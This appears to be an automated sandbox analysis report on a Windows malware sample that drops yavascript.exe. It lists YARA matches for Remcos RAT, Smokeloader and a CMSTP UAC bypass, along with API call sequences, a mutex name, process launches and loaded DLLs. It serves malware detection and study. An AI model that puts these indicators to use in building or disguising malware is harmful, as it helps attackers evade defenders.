Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000002.2463449959.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000014.00000003.2434483008.0000000002000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.2464609344.0000000001F80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: ltlbVjClX9.exe PID: 6464, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: yavascript.exe PID: 2604, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: yavascript.exe PID: 5020, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: yavascript.exe PID: 6772, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: ltlbVjClX9.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: yavascript.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@19/63@0/1

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	0_2_00417952
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02147BB9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	0_2_02147BB9
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	15_2_00417952
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00747BB9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	15_2_00747BB9
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	20_2_00417952
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F97BB9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	20_2_01F97BB9

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

0_2_0040F474

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

0_2_0041B4A8

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Code function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

0_2_0041AA4A

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

File created: C:\Users\user\AppData\Roaming\yavascript.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6464
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0ZPVF8
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2604

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\1bcf5e77-7a17-4e9f-bedb-67f07eed0004

Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: Software\	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: Rmc-0ZPVF8	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: Exe	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: Exe	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: Rmc-0ZPVF8	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: Inj	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: Inj	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: 8SG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: exepath	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: 8SG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: exepath	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: licence	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: dMG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: PSG	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: Administrator	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: User	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: del	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: del	0_2_0040E9C5
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Command line argument: del	0_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Software\	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Rmc-0ZPVF8	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Exe	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Exe	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Rmc-0ZPVF8	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Inj	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Inj	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: 8SG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: exepath	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: 8SG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: exepath	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: licence	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: dMG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PSG	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Administrator	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: User	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: del	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: del	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: del	15_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Software\	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Exe	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Inj	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Inj	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: 8SG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: exepath	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: 8SG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: exepath	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: licence	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: dMG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: PSG	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: Administrator	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: User	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: del	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: del	20_2_0040E9C5
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Command line argument: del	20_2_0040E9C5

Source: ltlbVjClX9.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ltlbVjClX9.exe	ReversingLabs: Detection: 76%
Source: ltlbVjClX9.exe	Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

File read: C:\Users\user\Desktop\ltlbVjClX9.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ltlbVjClX9.exe "C:\Users\user\Desktop\ltlbVjClX9.exe"
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 964
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1120
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1136
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1164
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1080
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 1212
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process created: C:\Users\user\AppData\Roaming\yavascript.exe "C:\Users\user\AppData\Roaming\yavascript.exe"
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 988
Source: unknown	Process created: C:\Users\user\AppData\Roaming\yavascript.exe "C:\Users\user\AppData\Roaming\yavascript.exe"
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 880
Source: unknown	Process created: C:\Users\user\AppData\Roaming\yavascript.exe "C:\Users\user\AppData\Roaming\yavascript.exe"
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 900
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 916
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 876
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 948
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 904
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 976
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Process created: C:\Users\user\AppData\Roaming\yavascript.exe "C:\Users\user\AppData\Roaming\yavascript.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Section loaded: winmm.dll
